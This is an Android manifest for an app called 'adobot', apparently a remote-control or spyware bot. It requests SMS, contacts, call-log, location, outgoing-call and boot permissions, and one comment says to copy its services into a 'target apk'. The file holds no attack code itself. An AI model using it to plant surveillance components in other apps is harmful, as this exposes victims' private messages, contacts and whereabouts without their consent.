<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.adobot">

    <uses-permission
        android:name="android.permission.ACCESS_FINE_LOCATION"
        android:required="true" />
    <uses-permission
        android:name="android.permission.ACCESS_COARSE_LOCATION"
        android:required="true" />
    <uses-permission
        android:name="android.permission.ACCESS_NETWORK_STATE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.INTERNET"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_SMS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.SEND_SMS" />
    <uses-permission
        android:name="android.permission.READ_CONTACTS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.WRITE_CONTACTS"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_CALL_LOG"
        android:required="true" />
    <uses-permission
        android:name="android.permission.WRITE_CALL_LOG"
        android:required="true" />
    <uses-permission
        android:name="android.permission.READ_PHONE_STATE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.WRITE_EXTERNAL_STORAGE"
        android:required="true" />
    <uses-permission
        android:name="android.permission.RECEIVE_BOOT_COMPLETED"
        android:required="true" />

    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"></uses-permission>

    <uses-feature
        android:name="android.software.leanback"
        android:required="true" />

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name="com.android.adobot.activities.SetupActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
                <!--<category android:name="android.intent.category.LEANBACK_LAUNCHER"/>-->
            </intent-filter>
        </activity>

        <!--copy the receivers and services to the target apk source-->
        <activity android:name="com.android.adobot.activities.UpdateActivity"></activity>
        <activity android:name="com.android.adobot.activities.PermissionsActivity"></activity>

        <service android:name="com.android.adobot.network.NetworkSchedulerService"
            android:exported="true"
            android:permission="android.permission.BIND_JOB_SERVICE" />

        <!--end of services and receivers-->

    </application>

</manifest>
